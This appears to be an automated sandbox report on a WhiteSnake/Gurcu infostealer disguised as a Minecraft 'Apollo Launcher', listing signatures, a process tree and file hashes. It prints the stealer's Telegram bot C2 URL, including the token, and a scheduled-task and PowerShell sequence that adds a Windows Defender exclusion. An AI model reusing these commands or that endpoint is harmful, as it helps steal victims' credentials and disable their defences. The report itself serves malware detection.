Analysis

  • max time kernel
    74s
  • max time network
    73s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-12-2024 02:14

General

  • Target

    http://workupload.com/file/Yj7tM2AfdF7

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7515908842:AAGcQXQiGBxzB0Fs7UXvL8_8mBkGJs3teYE/sendDocument?chat_id=-4549607810&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://workupload.com/file/Yj7tM2AfdF7
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9f2dccc40,0x7ff9f2dccc4c,0x7ff9f2dccc58
      2⤵
        PID:1432
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2016,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:2
        2⤵
          PID:3840
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1824,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2492 /prefetch:3
          2⤵
            PID:2576
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2124,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2596 /prefetch:8
            2⤵
              PID:3064
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3060 /prefetch:1
              2⤵
                PID:2068
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
                2⤵
                  PID:1756
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3656,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4468 /prefetch:1
                  2⤵
                    PID:708
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3512,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3488 /prefetch:8
                    2⤵
                      PID:2300
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3436,i,8302610444921669105,13289885382247762012,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4984 /prefetch:8
                      2⤵
                        PID:2992
                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                      1⤵
                        PID:3184
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                        1⤵
                          PID:5044
                        • C:\Windows\System32\rundll32.exe
                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                          1⤵
                            PID:3272
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Apollo_Launcher\Apollo_Launcher\start.bat" "
                            1⤵
                              PID:3956
                              • C:\Windows\system32\net.exe
                                net session
                                2⤵
                                  PID:3248
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 session
                                    3⤵
                                      PID:1756
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /query /tn "HP-Helper"
                                    2⤵
                                      PID:2312
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn "HP-Helper" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'" /sc once /st 00:00 /rl highest /f
                                      2⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4540
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /run /tn "HP-Helper"
                                      2⤵
                                        PID:4880
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 3 /nobreak
                                        2⤵
                                        • Delays execution with timeout.exe
                                        PID:2624
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /delete /tn "HP-Helper" /f
                                        2⤵
                                          PID:3396
                                        • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
                                          java -jar Apollo.jar
                                          2⤵
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2872
                                          • C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
                                            C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
                                            3⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2152
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3A16.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3A16.tmp.bat
                                              4⤵
                                                PID:3404
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                          1⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3404
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Apollo_Launcher\Apollo_Launcher\start.bat" "
                                          1⤵
                                            PID:436
                                            • C:\Windows\system32\net.exe
                                              net session
                                              2⤵
                                                PID:3452
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 session
                                                  3⤵
                                                    PID:4900
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /query /tn "HP-Helper"
                                                  2⤵
                                                    PID:3352
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /create /tn "HP-Helper" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'" /sc once /st 00:00 /rl highest /f
                                                    2⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2300
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /run /tn "HP-Helper"
                                                    2⤵
                                                      PID:4464
                                                    • C:\Windows\system32\timeout.exe
                                                      timeout /t 3 /nobreak
                                                      2⤵
                                                      • Delays execution with timeout.exe
                                                      PID:2120
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /delete /tn "HP-Helper" /f
                                                      2⤵
                                                        PID:3928
                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
                                                        java -jar Apollo.jar
                                                        2⤵
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:904
                                                        • C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3780
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                      1⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4136

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                      Filesize

                                                      649B

                                                      MD5

                                                      f1d849b0a43a928e4ee156357961b037

                                                      SHA1

                                                      8e27f701cdf90637fa435c2b5638a4cb968e095b

                                                      SHA256

                                                      16a4dd535964c77d5f20a41a28783b654798f3ae5744a6ff78a88531cdae9a0f

                                                      SHA512

                                                      84ef32d89ab9d21e91e6ebf1e45c48ee30588c4f64370ce430a5570dadaa1eb37ee4621ad44257db2c27c55a475adb1da04349ac0923856a8469b997c2369882

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                      Filesize

                                                      216B

                                                      MD5

                                                      0020f679bdae94c89d0f577e69dc3899

                                                      SHA1

                                                      6077b3db611d04c060e2775421dda200a5cbfa6f

                                                      SHA256

                                                      abca23ca42b1d22b5a14d8a9195361173d8712f9535cc82b9ef14566fdf84194

                                                      SHA512

                                                      121cc146a72a101bffa30200917c4133b88978c9114b06016c13c3f409846f12a01a4a9d667d0bfc01fc05a946d4cf5ebd75297191cf62b65562dd22e10bb2f4

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

                                                      Filesize

                                                      160KB

                                                      MD5

                                                      f8a139495a59410b1483c595b053b251

                                                      SHA1

                                                      82209afe45104ca1fa239e20dc9451e7e839f561

                                                      SHA256

                                                      4922baa650d42f0a3584ad86b7a8615517c8cf0ce18c0a2674e972a88c4fffe6

                                                      SHA512

                                                      9aa8a0b525af0cb4b675852152020e184d23c78a41273059090c85cc055c819cb96141a76c823a8f5d941e6c42875b9f347ebe3bfd58c84cc73740b1a748bfa9

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                      Filesize

                                                      20KB

                                                      MD5

                                                      716eac07ac9ee34c9b1baf5e64c9c789

                                                      SHA1

                                                      171447c7bc81929103deeca16f25f68d06e906ea

                                                      SHA256

                                                      7c8bf521c2c6f404d6ccad66f85fa4475498a99a38dbb3c1d9a54893e71eddfd

                                                      SHA512

                                                      472918294949768eb1309db606466f78557132cbb21ed70b3a49ebc4365c0e035fbbafa19f69773f32c0bea38d07cbd12c95bcef8d087b2de77c704c74d72e2f

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      362093bf9b7bc7ef6ac9790f5ff0c9a9

                                                      SHA1

                                                      c8b967f2e045a37f15cc5c075b209c4986b8bdb5

                                                      SHA256

                                                      8fd5e5cbc8f7aa76004912ef7f93b05a34ea9cfe80697872cb3c6c2fb3e5ecce

                                                      SHA512

                                                      48eceaee82b3d204dcb3ab2ffd2276949bf2868c41b480e1c9a493937bd19c107a1419736eb0aff2285ab2077af4b1fb4b36909f5288f0336a0df903f5dd71dc

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                      Filesize

                                                      2B

                                                      MD5

                                                      d751713988987e9331980363e24189ce

                                                      SHA1

                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                      SHA256

                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                      SHA512

                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                      Filesize

                                                      9KB

                                                      MD5

                                                      9a265dc9db28b8e8039f3346eaf88922

                                                      SHA1

                                                      7bd5f567861300b4b05b8cef467f6af7de35954e

                                                      SHA256

                                                      702fcff2ff3c32ebd8c733b17145240f753c7da7dfe7736d8387e50971100626

                                                      SHA512

                                                      9d46c40daee8c17382a91640e41c4218c0800c6846daed75ec0c44bfde945c58dcc22d5d6444b39fafb4e43226aa1efdcd38527810d803fc53a15935df1a7348

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                      Filesize

                                                      9KB

                                                      MD5

                                                      2dbe41c2b689a2deb4c6a05c5e9a6e8a

                                                      SHA1

                                                      53206c879cc0c81189ddc5b586b80e9ee859aebd

                                                      SHA256

                                                      33dda3de0d53d90c5bdc4a282275e4c4d947129c9b19a221d6f32d90ac1df45e

                                                      SHA512

                                                      abd1ffc6f85222b2425338cdd1dbcda8a4a99592ae91e8cdcf26d05a56afc8ceb4296f071e0a6691aa95f92b53335870030ef09bddaca73af51043075031690a

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                      Filesize

                                                      116KB

                                                      MD5

                                                      1702e146ea6ef7ccfb0d752732cfac0f

                                                      SHA1

                                                      a2b5516f18bf40b4fc8038f11d3892fab9ee99d8

                                                      SHA256

                                                      871d4fc657925e8602b211a2abafe8cf4b3a4ab9c1785a12fa5f21d1cea3f8a1

                                                      SHA512

                                                      830edb62f281014940fed5679cf84c40867b5f516c48131fe1ab9ab581d644c7b68247c186deeae95095fdeb7fee3d44a5dff236cfdafc82a3cd32aeac03f039

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                      Filesize

                                                      116KB

                                                      MD5

                                                      cce0bc0fe01ceff0de423d1358fa6c97

                                                      SHA1

                                                      8be3ef99d716b081faa3e95bb7faf67a8f3760c2

                                                      SHA256

                                                      f1df0705cf5bb43a17b8879dbad0f97077c030d083c2b9ab82b9ffad0ee4a1e8

                                                      SHA512

                                                      f76114c3d9e1acdaafaaa1e93943ec3b1e59e2efc2898927d36e5b28a5146de9478a6f47777808ca5ec43b98172d972279f025e1b774a41f1a9335952a07c119

                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

                                                      Filesize

                                                      264KB

                                                      MD5

                                                      f50f89a0a91564d0b8a211f8921aa7de

                                                      SHA1

                                                      112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                      SHA256

                                                      b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                      SHA512

                                                      bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Minecraft_Client_1.21.1.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      22644e1605158f0c04a1940cef2d9047

                                                      SHA1

                                                      8ad0045ba1dc8307fe90456a0b9a3e093be1f3e9

                                                      SHA256

                                                      803a8511657d20066aeb9028e15c66281417026c68ed8d0edb4c1191ee1237fb

                                                      SHA512

                                                      dd7b5288a1144e5e3d82f0a796d185f2fe92e6691534e3b4ec32593762c51e8e1df799b9b597a126558dcbd0440ef450679ce9ae4d1c22cac0858faedd20ebe8

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      944B

                                                      MD5

                                                      77d622bb1a5b250869a3238b9bc1402b

                                                      SHA1

                                                      d47f4003c2554b9dfc4c16f22460b331886b191b

                                                      SHA256

                                                      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                      SHA512

                                                      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                    • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

                                                      Filesize

                                                      1.7MB

                                                      MD5

                                                      65ccd6ecb99899083d43f7c24eb8f869

                                                      SHA1

                                                      27037a9470cc5ed177c0b6688495f3a51996a023

                                                      SHA256

                                                      aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

                                                      SHA512

                                                      533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

                                                    • C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1.zip

                                                      Filesize

                                                      4.1MB

                                                      MD5

                                                      47eb705af8dcef76e15efc9d5c8819c1

                                                      SHA1

                                                      5c3507fffa3d01613d9c0649092dbcf944d8189b

                                                      SHA256

                                                      18ec21b43487446b91384a8e227275a8b1d2a4a9031c2745553cde22dc2015e6

                                                      SHA512

                                                      3e5aca2b0041e08122bdcf8d1d19cc4a8568624dc77b638c4ec02ea3abdf2a0f4ea7db000b5ff95d2b20c7aa0caab8d54c201b85a6c8a075ced415b073a28432

                                                    • C:\Users\Admin\AppData\Local\Temp\Minecraft_Client_1.21.1\Minecraft_Client_1.21.1.exe

                                                      Filesize

                                                      5.6MB

                                                      MD5

                                                      31946abddd530c1e86f36c191046336b

                                                      SHA1

                                                      b480a8833f684cba353f628c087bf7297a4d4df8

                                                      SHA256

                                                      272a3703b7c4e353638c410008c95503abb90d47b81c5b253773cb0d546e5a0d

                                                      SHA512

                                                      93aeacbb4227b9ae1f731135dc42697fbdadff9c3259ccde9d7b7b4eecfef89c71e3d773df4281cae3d84f81246d6a95da9eaaea85efb949ca33a42f97ead8cb

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djb0qqrb.12n.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • C:\Users\Admin\AppData\Local\Temp\tmp3A16.tmp.bat

                                                      Filesize

                                                      215B

                                                      MD5

                                                      edecc78b2f241e1272f6197fe89b7e9c

                                                      SHA1

                                                      f454966e03384768f142ff452dbf351dc25bdfdf

                                                      SHA256

                                                      03f91fda3049aa1a33f7b680ba0fd7a2df926e878275ef0433be1838f3e884da

                                                      SHA512

                                                      e60e40c598001e122f8988bba13022db987c16a5515280c79e4b2ffcc5b507ff0a399a5273db533ba5ba37d63207af9b027eb7e768745d48499cc9a6fb86a04f

                                                    • C:\Users\Admin\AppData\Roaming\AdminUserCash\CREDIT~1

                                                      Filesize

                                                      116KB

                                                      MD5

                                                      f70aa3fa04f0536280f872ad17973c3d

                                                      SHA1

                                                      50a7b889329a92de1b272d0ecf5fce87395d3123

                                                      SHA256

                                                      8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                      SHA512

                                                      30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-493223053-2004649691-1575712786-1000\83aa4cc77f591dfc2374580bbd95f6ba_755b0f1a-bb38-4bb2-bc7e-240c892146ee

                                                      Filesize

                                                      45B

                                                      MD5

                                                      c8366ae350e7019aefc9d1e6e6a498c6

                                                      SHA1

                                                      5731d8a3e6568a5f2dfbbc87e3db9637df280b61

                                                      SHA256

                                                      11e6aca8e682c046c83b721eeb5c72c5ef03cb5936c60df6f4993511ddc61238

                                                      SHA512

                                                      33c980d5a638bfc791de291ebf4b6d263b384247ab27f261a54025108f2f85374b579a026e545f81395736dd40fa4696f2163ca17640dd47f1c42bc9971b18cd

                                                    • C:\Users\Admin\Downloads\Apollo_Launcher.zip.crdownload

                                                      Filesize

                                                      1.9MB

                                                      MD5

                                                      cf73d6762749d11543a4e460cff5d397

                                                      SHA1

                                                      660b32ae6fb5d892cd876362d5532050843738c0

                                                      SHA256

                                                      4db6dc9037c5d39bead0329595ff1d7b570a030f77b5e5d7d09e904b78ba4115

                                                      SHA512

                                                      f0cb91d5ff524d4d68e1ed83cb8e7445170a8db0979d202eca28f2e50a9a82478b1f1f433e0605865f4ec74d884e9470b98ef4df339fe788924a809e630516a8

                                                    • memory/904-413-0x0000022609260000-0x0000022609261000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/904-403-0x0000022609260000-0x0000022609261000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/904-473-0x0000022609260000-0x0000022609261000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/904-466-0x0000022609260000-0x0000022609261000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/904-445-0x0000022609260000-0x0000022609261000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/904-438-0x0000022609260000-0x0000022609261000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2152-335-0x000001A6F6900000-0x000001A6F6912000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/2152-308-0x000001A6F65D0000-0x000001A6F68FE000-memory.dmp

                                                      Filesize

                                                      3.2MB

                                                    • memory/2152-301-0x000001A6F5820000-0x000001A6F58D2000-memory.dmp

                                                      Filesize

                                                      712KB

                                                    • memory/2152-306-0x000001A6F59A0000-0x000001A6F59DA000-memory.dmp

                                                      Filesize

                                                      232KB

                                                    • memory/2152-295-0x000001A6F5560000-0x000001A6F55D6000-memory.dmp

                                                      Filesize

                                                      472KB

                                                    • memory/2152-307-0x000001A6DB460000-0x000001A6DB486000-memory.dmp

                                                      Filesize

                                                      152KB

                                                    • memory/2152-289-0x000001A6DAA50000-0x000001A6DAFEA000-memory.dmp

                                                      Filesize

                                                      5.6MB

                                                    • memory/2152-294-0x000001A6DB430000-0x000001A6DB43A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/2152-299-0x000001A6F5490000-0x000001A6F54FA000-memory.dmp

                                                      Filesize

                                                      424KB

                                                    • memory/2152-298-0x000001A6DB440000-0x000001A6DB45E000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/2152-302-0x000001A6F58D0000-0x000001A6F5920000-memory.dmp

                                                      Filesize

                                                      320KB

                                                    • memory/2872-259-0x0000025861530000-0x0000025861531000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2872-221-0x0000025861530000-0x0000025861531000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2872-360-0x0000025861530000-0x0000025861531000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/3404-196-0x000001543A3C0000-0x000001543A3E2000-memory.dmp

                                                      Filesize

                                                      136KB